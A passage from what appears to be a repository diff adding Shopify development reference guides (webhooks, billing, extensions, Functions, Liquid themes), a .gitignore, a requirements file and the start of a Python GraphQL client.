shop_deletion_url = "/webhooks/gdpr/shop-deletion"
```

### Webhook Handler

```javascript
import crypto from "crypto";

function verifyWebhook(req) {
  const hmac = req.headers["x-shopify-hmac-sha256"];
  const body = req.rawBody; // Raw body buffer

  const hash = crypto
    .createHmac("sha256", process.env.SHOPIFY_API_SECRET)
    .update(body, "utf8")
    .digest("base64");

  // Constant-time comparison prevents timing attacks
  return (
    Boolean(hmac) &&
    hmac.length === hash.length &&
    crypto.timingSafeEqual(Buffer.from(hash), Buffer.from(hmac))
  );
}

app.post("/webhooks/orders/create", async (req, res) => {
  if (!verifyWebhook(req)) {
    return res.status(401).send("Unauthorized");
  }

  const order = req.body;
  console.log("New order:", order.id, order.name);

  // Process order...

  res.status(200).send("OK");
});
```

### Common Webhook Topics

**Orders:**

- `orders/create`, `orders/updated`, `orders/delete`
- `orders/paid`, `orders/cancelled`, `orders/fulfilled`

**Products:**

- `products/create`, `products/update`, `products/delete`

**Customers:**

- `customers/create`, `customers/update`, `customers/delete`

**Inventory:**

- `inventory_levels/update`

**App:**

- `app/uninstalled` (critical for cleanup)

## Billing Integration

### App Charges

**One-time Charge:**

```graphql
mutation CreateCharge($input: AppPurchaseOneTimeInput!) {
  appPurchaseOneTimeCreate(input: $input) {
    appPurchaseOneTime {
      id
      name
      price {
        amount
      }
      status
      confirmationUrl
    }
    userErrors {
      field
      message
    }
  }
}
```

Variables:

```json
{
  "input": {
    "name": "Premium Feature",
    "price": { "amount": 49.99, "currencyCode": "USD" },
    "returnUrl": "https://your-app.com/billing/callback"
  }
}
```

**Recurring Charge (Subscription):**

```graphql
mutation CreateSubscription(
  $name: String!
  $returnUrl: URL!
  $lineItems: [AppSubscriptionLineItemInput!]!
  $trialDays: Int
) {
  appSubscriptionCreate(
    name: $name
    returnUrl: $returnUrl
    lineItems: $lineItems
    trialDays: $trialDays
  ) {
    appSubscription {
      id
      name
      status
    }
    confirmationUrl
    userErrors {
      field
      message
    }
  }
}
```

Variables:

```json
{
  "name": "Monthly Subscription",
  "returnUrl": "https://your-app.com/billing/callback",
  "trialDays": 7,
  "lineItems": [
    {
      "plan": {
        "appRecurringPricingDetails": {
          "price": { "amount": 29.99, "currencyCode": "USD" },
          "interval": "EVERY_30_DAYS"
        }
      }
    }
  ]
}
```

**Usage-based Billing:**

```graphql
mutation CreateUsageCharge(
  $subscriptionLineItemId: ID!
  $price: MoneyInput!
  $description: String!
) {
  appUsageRecordCreate(
    subscriptionLineItemId: $subscriptionLineItemId
    price: $price
    description: $description
  ) {
    appUsageRecord {
      id
      price {
        amount
        currencyCode
      }
      description
    }
    userErrors {
      field
      message
    }
  }
}
```

Variables:

```json
{
  "subscriptionLineItemId": "gid://shopify/AppSubscriptionLineItem/123",
  "price": { "amount": "5.00", "currencyCode": "USD" },
  "description": "100 API calls used"
}
```

## Metafields

### Create/Update Metafields

```graphql
mutation SetMetafields($metafields: [MetafieldsSetInput!]!) {
  metafieldsSet(metafields: $metafields) {
    metafields {
      id
      namespace
      key
      value
    }
    userErrors {
      field
      message
    }
  }
}
```

Variables:

```json
{
  "metafields": [
    {
      "ownerId": "gid://shopify/Product/123",
      "namespace": "custom",
      "key": "instructions",
      "value": "Handle with care",
      "type": "single_line_text_field"
    }
  ]
}
```

**Metafield Types:**

- `single_line_text_field`, `multi_line_text_field`
- `number_integer`, `number_decimal`
- `date`, `date_time`
- `url`, `json`
- `file_reference`, `product_reference`
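For `json`-typed metafields, `value` must be a JSON *string*, not a raw object. A small sketch of building one `metafieldsSet` input entry (the namespace and key are illustrative):

```javascript
// Build one metafieldsSet input entry; json values are stringified
// because Shopify stores every metafield value as a string.
function jsonMetafield(ownerId, namespace, key, obj) {
  return {
    ownerId,
    namespace,
    key,
    type: "json",
    value: JSON.stringify(obj),
  };
}
```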

## Rate Limiting

### GraphQL Cost-Based Limits

**Limits:**

- Available points: 2000
- Restore rate: 100 points/second
- Max query cost: 2000
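Under this leaky-bucket model a client can estimate how long to wait before a query of known cost will fit. A sketch assuming the limits above:

```javascript
// Seconds to wait until `cost` points are available, given the current
// bucket state and the restore rate (points per second).
function secondsUntilAffordable(cost, currentlyAvailable, restoreRate = 100) {
  if (cost <= currentlyAvailable) return 0;
  return (cost - currentlyAvailable) / restoreRate;
}
```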

**Check Cost:**

```javascript
// Note: this assumes access to the full response body (the `extensions`
// key), not just the `data` payload that graphqlRequest above returns.
const response = await graphqlRequest(shop, token, query);
const cost = response.extensions?.cost;

console.log(
  `Cost: ${cost.actualQueryCost}/${cost.throttleStatus.maximumAvailable}`,
);
```

**Handle Throttling:**

```javascript
const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

async function graphqlWithRetry(shop, token, query, retries = 3) {
  for (let i = 0; i < retries; i++) {
    try {
      return await graphqlRequest(shop, token, query);
    } catch (error) {
      if (error.message.includes("Throttled") && i < retries - 1) {
        await sleep(Math.pow(2, i) * 1000); // Exponential backoff
        continue;
      }
      throw error;
    }
  }
}
```
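The backoff schedule above doubles on each attempt. Isolated as a pure function (same 1-second base as the retry loop):

```javascript
// Delay in ms before retry attempt i (0-based): 1s, 2s, 4s, ...
function backoffDelay(attempt, baseMs = 1000) {
  return Math.pow(2, attempt) * baseMs;
}
```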

## Best Practices

**Security:**

- Store credentials in environment variables
- Verify webhook HMAC signatures
- Validate OAuth state parameter
- Use HTTPS for all endpoints
- Implement rate limiting on your endpoints

**Performance:**

- Cache access tokens securely
- Use bulk operations for large datasets
- Implement pagination for queries
- Monitor GraphQL query costs

**Reliability:**

- Implement exponential backoff for retries
- Handle webhook delivery failures
- Log errors for debugging
- Monitor app health metrics

**Compliance:**

- Implement GDPR webhooks (mandatory)
- Handle customer data deletion requests
- Provide data export functionality
- Follow data retention policies

555
skills/shopify-development/references/extensions.md
Normal file
@@ -0,0 +1,555 @@

# Extensions Reference

Guide for building UI extensions and Shopify Functions.

## Checkout UI Extensions

Customize checkout and thank-you pages with native-rendered components.

### Extension Points

**Block Targets (Merchant-Configurable):**

- `purchase.checkout.block.render` - Main checkout
- `purchase.thank-you.block.render` - Thank you page

**Static Targets (Fixed Position):**

- `purchase.checkout.header.render-after`
- `purchase.checkout.contact.render-before`
- `purchase.checkout.shipping-option-list.render-after`
- `purchase.checkout.payment-method-list.render-after`
- `purchase.checkout.footer.render-before`

### Setup

```bash
shopify app generate extension --type checkout_ui_extension
```

Configuration (`shopify.extension.toml`):

```toml
api_version = "2026-01"
name = "gift-message"
type = "ui_extension"

[[extensions.targeting]]
target = "purchase.checkout.block.render"

[capabilities]
network_access = true
api_access = true
```

### Basic Example

```javascript
import { useState, useEffect } from "react";
import {
  reactExtension,
  BlockStack,
  TextField,
  Checkbox,
  useApi,
} from "@shopify/ui-extensions-react/checkout";

export default reactExtension("purchase.checkout.block.render", () => (
  <Extension />
));

function Extension() {
  const [message, setMessage] = useState("");
  const [isGift, setIsGift] = useState(false);
  const { applyAttributeChange } = useApi();

  useEffect(() => {
    if (isGift) {
      applyAttributeChange({
        type: "updateAttribute",
        key: "gift_message",
        value: message,
      });
    }
  }, [message, isGift]);

  return (
    <BlockStack spacing="loose">
      <Checkbox checked={isGift} onChange={setIsGift}>
        This is a gift
      </Checkbox>
      {isGift && (
        <TextField
          label="Gift Message"
          value={message}
          onChange={setMessage}
          multiline={3}
        />
      )}
    </BlockStack>
  );
}
```

### Common Hooks

**useApi:**

```javascript
const { extensionPoint, shop, storefront, i18n, sessionToken } = useApi();
```

**useCartLines:**

```javascript
const lines = useCartLines();
lines.forEach((line) => {
  console.log(line.merchandise.product.title, line.quantity);
});
```

**useShippingAddress:**

```javascript
const address = useShippingAddress();
console.log(address.city, address.countryCode);
```

**useApplyCartLinesChange:**

```javascript
const applyChange = useApplyCartLinesChange();

async function addItem() {
  await applyChange({
    type: "addCartLine",
    merchandiseId: "gid://shopify/ProductVariant/123",
    quantity: 1,
  });
}
```

### Core Components

**Layout:**

- `BlockStack` - Vertical stacking
- `InlineStack` - Horizontal layout
- `Grid`, `GridItem` - Grid layout
- `View` - Container
- `Divider` - Separator

**Input:**

- `TextField` - Text input
- `Checkbox` - Boolean
- `Select` - Dropdown
- `DatePicker` - Date selection
- `Form` - Form wrapper

**Display:**

- `Text`, `Heading` - Typography
- `Banner` - Messages
- `Badge` - Status
- `Image` - Images
- `Link` - Hyperlinks
- `List`, `ListItem` - Lists

**Interactive:**

- `Button` - Actions
- `Modal` - Overlays
- `Pressable` - Click areas
## Admin UI Extensions

Extend the Shopify admin interface.

### Admin Action

Custom actions on resource pages.

```bash
shopify app generate extension --type admin_action
```

```javascript
import {
  reactExtension,
  useData,
  AdminAction,
  Button,
} from "@shopify/ui-extensions-react/admin";

export default reactExtension("admin.product-details.action.render", () => (
  <Extension />
));

function Extension() {
  const { data } = useData();

  async function handleExport() {
    const response = await fetch("/api/export", {
      method: "POST",
      body: JSON.stringify({ productId: data.product.id }),
    });
    console.log("Exported:", await response.json());
  }

  return (
    <AdminAction
      title="Export Product"
      primaryAction={<Button onPress={handleExport}>Export</Button>}
    />
  );
}
```

**Targets:**

- `admin.product-details.action.render`
- `admin.order-details.action.render`
- `admin.customer-details.action.render`

### Admin Block

Embedded content in admin pages.

```javascript
import { useState, useEffect } from "react";
import {
  reactExtension,
  useData,
  BlockStack,
  Text,
  Badge,
} from "@shopify/ui-extensions-react/admin";

export default reactExtension("admin.product-details.block.render", () => (
  <Extension />
));

function Extension() {
  const { data } = useData();
  const [analytics, setAnalytics] = useState(null);

  useEffect(() => {
    fetchAnalytics(data.product.id).then(setAnalytics);
  }, []);

  return (
    <BlockStack>
      <Text variant="headingMd">Product Analytics</Text>
      <Text>Views: {analytics?.views || 0}</Text>
      <Text>Conversions: {analytics?.conversions || 0}</Text>
      <Badge tone={analytics?.trending ? "success" : "info"}>
        {analytics?.trending ? "Trending" : "Normal"}
      </Badge>
    </BlockStack>
  );
}
```

**Targets:**

- `admin.product-details.block.render`
- `admin.order-details.block.render`
- `admin.customer-details.block.render`
## POS UI Extensions

Customize the Point of Sale experience.

### Smart Grid Tile

Quick-access action on the POS home screen.

```javascript
import {
  reactExtension,
  SmartGridTile,
} from "@shopify/ui-extensions-react/pos";

export default reactExtension("pos.home.tile.render", () => <Extension />);

function Extension() {
  function handlePress() {
    // Navigate to custom workflow
  }

  return (
    <SmartGridTile
      title="Gift Cards"
      subtitle="Manage gift cards"
      onPress={handlePress}
    />
  );
}
```

### POS Modal

Full-screen workflow.

```javascript
import { useState } from "react";
import {
  reactExtension,
  useApi,
  Screen,
  BlockStack,
  Button,
  TextField,
} from "@shopify/ui-extensions-react/pos";

export default reactExtension("pos.home.modal.render", () => <Extension />);

function Extension() {
  const { navigation } = useApi();
  const [amount, setAmount] = useState("");

  function handleIssue() {
    // Issue gift card
    navigation.pop();
  }

  return (
    <Screen name="Gift Card" title="Issue Gift Card">
      <BlockStack>
        <TextField label="Amount" value={amount} onChange={setAmount} />
        <TextField label="Recipient Email" />
        <Button onPress={handleIssue}>Issue</Button>
      </BlockStack>
    </Screen>
  );
}
```

## Customer Account Extensions

Customize customer account pages.

### Order Status Extension

```javascript
import {
  reactExtension,
  useApi,
  BlockStack,
  Text,
  Button,
} from "@shopify/ui-extensions-react/customer-account";

export default reactExtension(
  "customer-account.order-status.block.render",
  () => <Extension />,
);

function Extension() {
  const { order } = useApi();

  function handleReturn() {
    // Initiate return
  }

  return (
    <BlockStack>
      <Text variant="headingMd">Need to return?</Text>
      <Text>Start return for order {order.name}</Text>
      <Button onPress={handleReturn}>Start Return</Button>
    </BlockStack>
  );
}
```

**Targets:**

- `customer-account.order-status.block.render`
- `customer-account.order-index.block.render`
- `customer-account.profile.block.render`
## Shopify Functions

Serverless backend customization.

### Function Types

**Discounts:**

- `order_discount` - Order-level discounts
- `product_discount` - Product-specific discounts
- `shipping_discount` - Shipping discounts

**Payment Customization:**

- Hide/rename/reorder payment methods

**Delivery Customization:**

- Custom shipping options
- Delivery rules

**Validation:**

- Cart validation rules
- Checkout validation

### Create Function

```bash
shopify app generate extension --type function
```

### Order Discount Function

Input query (`input.graphql`):

```graphql
query Input {
  cart {
    lines {
      quantity
      merchandise {
        ... on ProductVariant {
          id
          product {
            hasTag(tag: "bulk-discount")
          }
        }
      }
    }
  }
}
```

Function (`function.js`):

```javascript
export default function orderDiscount(input) {
  const targets = input.cart.lines
    .filter((line) => line.merchandise.product.hasTag)
    .map((line) => ({
      productVariant: { id: line.merchandise.id },
    }));

  if (targets.length === 0) {
    return { discounts: [] };
  }

  return {
    discounts: [
      {
        targets,
        value: {
          percentage: {
            value: 10, // 10% discount
          },
        },
      },
    ],
  };
}
```
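Run against a sample input shape, the function returns one 10% discount targeting only the tagged lines. A sketch with a hypothetical two-line cart (logic restated as a plain function for illustration):

```javascript
// Same logic as the order discount function above, as a plain function.
function orderDiscount(input) {
  const targets = input.cart.lines
    .filter((line) => line.merchandise.product.hasTag)
    .map((line) => ({ productVariant: { id: line.merchandise.id } }));

  if (targets.length === 0) return { discounts: [] };
  return { discounts: [{ targets, value: { percentage: { value: 10 } } }] };
}

// Hypothetical cart: one tagged line, one untagged line.
const result = orderDiscount({
  cart: {
    lines: [
      { quantity: 2, merchandise: { id: "gid://shopify/ProductVariant/1", product: { hasTag: true } } },
      { quantity: 1, merchandise: { id: "gid://shopify/ProductVariant/2", product: { hasTag: false } } },
    ],
  },
});
```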

### Payment Customization Function

```javascript
export default function paymentCustomization(input) {
  const hidePaymentMethods = input.cart.lines.some(
    (line) => line.merchandise.product.hasTag,
  );

  if (!hidePaymentMethods) {
    return { operations: [] };
  }

  return {
    operations: [
      {
        hide: {
          paymentMethodId: "gid://shopify/PaymentMethod/123",
        },
      },
    ],
  };
}
```

### Validation Function

```javascript
export default function cartValidation(input) {
  const errors = [];

  // Max 5 items per cart
  if (input.cart.lines.length > 5) {
    errors.push({
      localizedMessage: "Maximum 5 items allowed per order",
      target: "cart",
    });
  }

  // Min $50 for wholesale
  const isWholesale = input.cart.lines.some(
    (line) => line.merchandise.product.hasTag,
  );

  if (isWholesale && input.cart.cost.totalAmount.amount < 50) {
    errors.push({
      localizedMessage: "Wholesale orders require $50 minimum",
      target: "cart",
    });
  }

  return { errors };
}
```
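Fed a hypothetical wholesale cart under the $50 minimum, the validation returns exactly one error (logic restated as a plain function for illustration):

```javascript
// Same rules as the validation function above, as a plain function.
function cartValidation(input) {
  const errors = [];
  if (input.cart.lines.length > 5) {
    errors.push({ localizedMessage: "Maximum 5 items allowed per order", target: "cart" });
  }
  const isWholesale = input.cart.lines.some((line) => line.merchandise.product.hasTag);
  if (isWholesale && input.cart.cost.totalAmount.amount < 50) {
    errors.push({ localizedMessage: "Wholesale orders require $50 minimum", target: "cart" });
  }
  return { errors };
}

// Hypothetical wholesale cart totaling $30.
const result = cartValidation({
  cart: {
    lines: [{ merchandise: { product: { hasTag: true } } }],
    cost: { totalAmount: { amount: 30 } },
  },
});
```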

## Network Requests

Extensions can call external APIs.

```javascript
import { useApi } from "@shopify/ui-extensions-react/checkout";

function Extension() {
  const { sessionToken } = useApi();

  async function fetchData() {
    const token = await sessionToken.get();

    const response = await fetch("https://your-app.com/api/data", {
      headers: {
        Authorization: `Bearer ${token}`,
        "Content-Type": "application/json",
      },
    });

    return await response.json();
  }
}
```

## Best Practices

**Performance:**

- Lazy load data
- Memoize expensive computations
- Use loading states
- Minimize re-renders

**UX:**

- Provide clear error messages
- Show loading indicators
- Validate inputs
- Support keyboard navigation

**Security:**

- Verify session tokens on backend
- Sanitize user input
- Use HTTPS for all requests
- Don't expose sensitive data

**Testing:**

- Test on development stores
- Verify mobile/desktop
- Check accessibility
- Test edge cases

## Resources

- Checkout Extensions: https://shopify.dev/docs/api/checkout-extensions
- Admin Extensions: https://shopify.dev/docs/apps/admin/extensions
- Functions: https://shopify.dev/docs/apps/functions
- Components: https://shopify.dev/docs/api/checkout-ui-extensions/components

498
skills/shopify-development/references/themes.md
Normal file
@@ -0,0 +1,498 @@

# Themes Reference

Guide for developing Shopify themes with Liquid templating.

## Liquid Templating

### Syntax Basics

**Objects (Output):**

```liquid
{{ product.title }}
{{ product.price | money }}
{{ customer.email }}
```

**Tags (Logic):**

```liquid
{% if product.available %}
  <button>Add to Cart</button>
{% else %}
  <p>Sold Out</p>
{% endif %}

{% for product in collection.products %}
  {{ product.title }}
{% endfor %}

{% case product.type %}
  {% when 'Clothing' %}
    <span>Apparel</span>
  {% when 'Shoes' %}
    <span>Footwear</span>
  {% else %}
    <span>Other</span>
{% endcase %}
```

**Filters (Transform):**

```liquid
{{ product.title | upcase }}
{{ product.price | money }}
{{ product.description | strip_html | truncate: 100 }}
{{ product.image | img_url: 'medium' }}
{{ 'now' | date: '%B %d, %Y' }}
```

### Common Objects

**Product:**

```liquid
{{ product.id }}
{{ product.title }}
{{ product.handle }}
{{ product.description }}
{{ product.price }}
{{ product.compare_at_price }}
{{ product.available }}
{{ product.type }}
{{ product.vendor }}
{{ product.tags }}
{{ product.images }}
{{ product.variants }}
{{ product.featured_image }}
{{ product.url }}
```

**Collection:**

```liquid
{{ collection.title }}
{{ collection.handle }}
{{ collection.description }}
{{ collection.products }}
{{ collection.products_count }}
{{ collection.image }}
{{ collection.url }}
```

**Cart:**

```liquid
{{ cart.item_count }}
{{ cart.total_price }}
{{ cart.items }}
{{ cart.note }}
{{ cart.attributes }}
```

**Customer:**

```liquid
{{ customer.email }}
{{ customer.first_name }}
{{ customer.last_name }}
{{ customer.orders_count }}
{{ customer.total_spent }}
{{ customer.addresses }}
{{ customer.default_address }}
```

**Shop:**

```liquid
{{ shop.name }}
{{ shop.email }}
{{ shop.domain }}
{{ shop.currency }}
{{ shop.money_format }}
{{ shop.enabled_payment_types }}
```

### Common Filters

**String:**

- `upcase`, `downcase`, `capitalize`
- `strip_html`, `strip_newlines`
- `truncate: 100`, `truncatewords: 20`
- `replace: 'old', 'new'`

**Number:**

- `money` - Format currency
- `round`, `ceil`, `floor`
- `times`, `divided_by`, `plus`, `minus`

**Array:**

- `join: ', '`
- `first`, `last`
- `size`
- `map: 'property'`
- `where: 'property', 'value'`

**URL:**

- `img_url: 'size'` - Image URL
- `url_for_type`, `url_for_vendor`
- `link_to`, `link_to_type`

**Date:**

- `date: '%B %d, %Y'`

## Theme Architecture

### Directory Structure

```
theme/
├── assets/              # CSS, JS, images
├── config/              # Theme settings
│   ├── settings_schema.json
│   └── settings_data.json
├── layout/              # Base templates
│   └── theme.liquid
├── locales/             # Translations
│   └── en.default.json
├── sections/            # Reusable blocks
│   ├── header.liquid
│   ├── footer.liquid
│   └── product-grid.liquid
├── snippets/            # Small components
│   ├── product-card.liquid
│   └── icon.liquid
└── templates/           # Page templates
    ├── index.json
    ├── product.json
    ├── collection.json
    └── cart.liquid
```

### Layout

Base template wrapping all pages (`layout/theme.liquid`):

```liquid
<!DOCTYPE html>
<html lang="{{ request.locale.iso_code }}">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width,initial-scale=1">
  <title>{{ page_title }}</title>

  {{ content_for_header }}

  <link rel="stylesheet" href="{{ 'theme.css' | asset_url }}">
</head>
<body>
  {% section 'header' %}

  <main>
    {{ content_for_layout }}
  </main>

  {% section 'footer' %}

  <script src="{{ 'theme.js' | asset_url }}"></script>
</body>
</html>
```

### Templates

Page-specific structures (`templates/product.json`):

```json
{
  "sections": {
    "main": {
      "type": "product-template",
      "settings": {
        "show_vendor": true,
        "show_quantity_selector": true
      }
    },
    "recommendations": {
      "type": "product-recommendations"
    }
  },
  "order": ["main", "recommendations"]
}
```

Legacy format (`templates/product.liquid`):

```liquid
<div class="product">
  <div class="product-images">
    <img src="{{ product.featured_image | img_url: 'large' }}" alt="{{ product.title }}">
  </div>

  <div class="product-details">
    <h1>{{ product.title }}</h1>
    <p class="price">{{ product.price | money }}</p>

    {% form 'product', product %}
      <select name="id">
        {% for variant in product.variants %}
          <option value="{{ variant.id }}">{{ variant.title }} - {{ variant.price | money }}</option>
        {% endfor %}
      </select>

      <button type="submit">Add to Cart</button>
    {% endform %}
  </div>
</div>
```
### Sections
|
||||
|
||||
Reusable content blocks (`sections/product-grid.liquid`):
|
||||
|
||||
```liquid
|
||||
<div class="product-grid">
|
||||
{% for product in section.settings.collection.products %}
|
||||
<div class="product-card">
|
||||
<a href="{{ product.url }}">
|
||||
<img src="{{ product.featured_image | img_url: 'medium' }}" alt="{{ product.title }}">
|
||||
<h3>{{ product.title }}</h3>
|
||||
<p>{{ product.price | money }}</p>
|
||||
</a>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</div>
|
||||
|
||||
{% schema %}
|
||||
{
|
||||
"name": "Product Grid",
|
||||
"settings": [
|
||||
{
|
||||
"type": "collection",
|
||||
"id": "collection",
|
||||
"label": "Collection"
|
||||
},
|
||||
{
|
||||
"type": "range",
|
||||
"id": "products_per_row",
|
||||
"min": 2,
|
||||
"max": 5,
|
||||
"step": 1,
|
||||
"default": 4,
|
||||
"label": "Products per row"
|
||||
}
|
||||
],
|
||||
"presets": [
|
||||
{
|
||||
"name": "Product Grid"
|
||||
}
|
||||
]
|
||||
}
|
||||
{% endschema %}
|
||||
```
|
||||
|
||||
### Snippets
|
||||
|
||||
Small reusable components (`snippets/product-card.liquid`):
|
||||
|
||||
```liquid
|
||||
<div class="product-card">
|
||||
<a href="{{ product.url }}">
|
||||
{% if product.featured_image %}
|
||||
<img src="{{ product.featured_image | img_url: 'medium' }}" alt="{{ product.title }}">
|
||||
{% endif %}
|
||||
<h3>{{ product.title }}</h3>
|
||||
<p class="price">{{ product.price | money }}</p>
|
||||
{% if product.compare_at_price > product.price %}
|
||||
<p class="sale-price">{{ product.compare_at_price | money }}</p>
|
||||
{% endif %}
|
||||
</a>
|
||||
</div>
|
||||
```
|
||||
|
||||
Include snippet:
|
||||
```liquid
|
||||
{% render 'product-card', product: product %}
|
||||
```
|
||||
|

## Development Workflow

### Setup

```bash
# Initialize new theme
shopify theme init

# Choose Dawn (reference theme) or blank
```
### Local Development

```bash
# Start local server
shopify theme dev

# Preview at http://localhost:9292
# Changes auto-sync to development theme
```
### Pull Theme

```bash
# Pull live theme
shopify theme pull --live

# Pull specific theme
shopify theme pull --theme=123456789

# Pull only templates
shopify theme pull --only=templates
```
### Push Theme

```bash
# Push to development theme
shopify theme push --development

# Create new unpublished theme
shopify theme push --unpublished

# Push specific files
shopify theme push --only=sections,snippets
```
### Theme Check

Lint theme code:

```bash
shopify theme check
shopify theme check --auto-correct
```
## Common Patterns

### Product Form with Variants

```liquid
{% form 'product', product %}
  {% unless product.has_only_default_variant %}
    {% for option in product.options_with_values %}
      <div class="product-option">
        <label>{{ option.name }}</label>
        <select name="options[{{ option.name }}]">
          {% for value in option.values %}
            <option value="{{ value }}">{{ value }}</option>
          {% endfor %}
        </select>
      </div>
    {% endfor %}
  {% endunless %}

  <input type="hidden" name="id" value="{{ product.selected_or_first_available_variant.id }}">
  <input type="number" name="quantity" value="1" min="1">

  <button type="submit" {% unless product.available %}disabled{% endunless %}>
    {% if product.available %}Add to Cart{% else %}Sold Out{% endif %}
  </button>
{% endform %}
```
### Pagination

```liquid
{% paginate collection.products by 12 %}
  {% for product in collection.products %}
    {% render 'product-card', product: product %}
  {% endfor %}

  {% if paginate.pages > 1 %}
    <div class="pagination">
      {% if paginate.previous %}
        <a href="{{ paginate.previous.url }}">Previous</a>
      {% endif %}

      {% for part in paginate.parts %}
        {% if part.is_link %}
          <a href="{{ part.url }}">{{ part.title }}</a>
        {% else %}
          <span class="current">{{ part.title }}</span>
        {% endif %}
      {% endfor %}

      {% if paginate.next %}
        <a href="{{ paginate.next.url }}">Next</a>
      {% endif %}
    </div>
  {% endif %}
{% endpaginate %}
```
### Cart AJAX

```javascript
// Add to cart
fetch('/cart/add.js', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({
    id: variantId,
    quantity: 1
  })
})
  .then(res => res.json())
  .then(item => console.log('Added:', item));

// Get cart
fetch('/cart.js')
  .then(res => res.json())
  .then(cart => console.log('Cart:', cart));

// Update cart
fetch('/cart/change.js', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({
    id: lineItemKey,
    quantity: 2
  })
})
  .then(res => res.json());
```
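The raw `fetch` calls above don't surface Shopify's error responses (the cart endpoints return a JSON body with a `description` on failure). A small wrapper can centralize that; this is a sketch, with the `fetchImpl` parameter being an illustrative addition so the helper can be exercised without a live store:

```javascript
// Minimal cart-API helper. In the browser, omit the third argument and
// the global fetch is used; `fetchImpl` exists only to make it testable.
async function cartRequest(path, body, fetchImpl = fetch) {
  const res = await fetchImpl(path, {
    method: body ? 'POST' : 'GET',
    headers: { 'Content-Type': 'application/json' },
    body: body ? JSON.stringify(body) : undefined,
  });
  const data = await res.json();
  if (!res.ok) {
    // Shopify cart errors carry { status, message, description }
    throw new Error(data.description || data.message || `HTTP ${res.status}`);
  }
  return data;
}

// Usage: cartRequest('/cart/add.js', { id: variantId, quantity: 1 })
```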

## Metafields in Themes

Access custom data:

```liquid
{{ product.metafields.custom.care_instructions }}
{{ product.metafields.custom.material.value }}

{% if product.metafields.custom.featured %}
  <span class="badge">Featured</span>
{% endif %}
```
## Best Practices

**Performance:**

- Optimize images (use appropriate sizes)
- Minimize Liquid logic complexity
- Use lazy loading for images
- Defer non-critical JavaScript
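The image points above combine into a single tag. A sketch using the `image_url` filter with explicit dimensions and native lazy loading (the widths and `sizes` value are illustrative, not prescriptive):

```liquid
<img
  src="{{ product.featured_image | image_url: width: 600 }}"
  srcset="{{ product.featured_image | image_url: width: 300 }} 300w,
          {{ product.featured_image | image_url: width: 600 }} 600w,
          {{ product.featured_image | image_url: width: 900 }} 900w"
  sizes="(min-width: 750px) 33vw, 100vw"
  width="{{ product.featured_image.width }}"
  height="{{ product.featured_image.height }}"
  loading="lazy"
  alt="{{ product.featured_image.alt | escape }}">
```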

**Accessibility:**

- Use semantic HTML
- Include alt text for images
- Support keyboard navigation
- Ensure sufficient color contrast
**SEO:**

- Use descriptive page titles
- Include meta descriptions
- Structure content with headings
- Implement schema markup
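Schema markup is typically emitted as JSON-LD in the product template. A minimal sketch of a schema.org `Product` block; the exact fields should be adjusted to the data the store actually has, and the `json` filter handles escaping:

```liquid
<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "Product",
  "name": {{ product.title | json }},
  "description": {{ product.description | strip_html | json }},
  "offers": {
    "@type": "Offer",
    "priceCurrency": {{ cart.currency.iso_code | json }},
    "price": {{ product.price | divided_by: 100.0 | json }},
    "availability": "{% if product.available %}https://schema.org/InStock{% else %}https://schema.org/OutOfStock{% endif %}"
  }
}
</script>
```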

**Code Quality:**

- Follow Shopify theme guidelines
- Use consistent naming conventions
- Comment complex logic
- Keep sections focused and reusable
## Resources

- Theme Development: https://shopify.dev/docs/themes
- Liquid Reference: https://shopify.dev/docs/api/liquid
- Dawn Theme: https://github.com/Shopify/dawn
- Theme Check: https://shopify.dev/docs/themes/tools/theme-check
**skills/shopify-development/scripts/.gitignore** (new file, 49 lines)
```gitignore
# Python
__pycache__/
*.py[cod]
*$py.class
*.so
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
*.egg-info/
.installed.cfg
*.egg

# Testing
.coverage
.pytest_cache/
htmlcov/
.tox/
.nox/
coverage.xml
*.cover
*.py,cover

# Environments
.env
.venv
env/
venv/
ENV/

# IDE
.idea/
.vscode/
*.swp
*.swo
*~

# OS
.DS_Store
Thumbs.db
```
**skills/shopify-development/scripts/requirements.txt** (new file, 19 lines)
```text
# Shopify Skill Dependencies
# Python 3.10+ required

# No Python package dependencies - uses only standard library

# Testing dependencies (dev)
pytest>=8.0.0
pytest-cov>=4.1.0
pytest-mock>=3.12.0

# Note: This script requires the Shopify CLI tool
# Install Shopify CLI:
#   npm install -g @shopify/cli @shopify/theme
# or via Homebrew (macOS):
#   brew tap shopify/shopify
#   brew install shopify-cli
#
# Authenticate with:
#   shopify auth login
```
**skills/shopify-development/scripts/shopify_graphql.py** (new file, 428 lines)
```python
#!/usr/bin/env python3
"""
Shopify GraphQL Utilities

Helper functions for common Shopify GraphQL operations.
Provides query templates, pagination helpers, and rate limit handling.

Usage:
    from shopify_graphql import ShopifyGraphQL

    client = ShopifyGraphQL(shop_domain, access_token)
    products = client.get_products(first=10)
"""

import os
import time
import json
from typing import Dict, List, Optional, Any, Generator
from dataclasses import dataclass
from urllib.request import Request, urlopen
from urllib.error import HTTPError


# API Configuration
API_VERSION = "2026-01"
MAX_RETRIES = 3
RETRY_DELAY = 1.0  # seconds


@dataclass
class GraphQLResponse:
    """Container for GraphQL response data."""
    data: Optional[Dict[str, Any]] = None
    errors: Optional[List[Dict[str, Any]]] = None
    extensions: Optional[Dict[str, Any]] = None

    @property
    def is_success(self) -> bool:
        return self.errors is None or len(self.errors) == 0

    @property
    def query_cost(self) -> Optional[int]:
        """Get the actual query cost from extensions."""
        if self.extensions and 'cost' in self.extensions:
            return self.extensions['cost'].get('actualQueryCost')
        return None


class ShopifyGraphQL:
    """
    Shopify GraphQL API client with built-in utilities.

    Features:
    - Query templates for common operations
    - Automatic pagination
    - Rate limit handling with exponential backoff
    - Response parsing helpers
    """

    def __init__(self, shop_domain: str, access_token: str):
        """
        Initialize the GraphQL client.

        Args:
            shop_domain: Store domain (e.g., 'my-store.myshopify.com')
            access_token: Admin API access token
        """
        self.shop_domain = shop_domain.replace('https://', '').replace('http://', '')
        self.access_token = access_token
        self.base_url = f"https://{self.shop_domain}/admin/api/{API_VERSION}/graphql.json"

    def execute(self, query: str, variables: Optional[Dict] = None) -> GraphQLResponse:
        """
        Execute a GraphQL query/mutation.

        Args:
            query: GraphQL query string
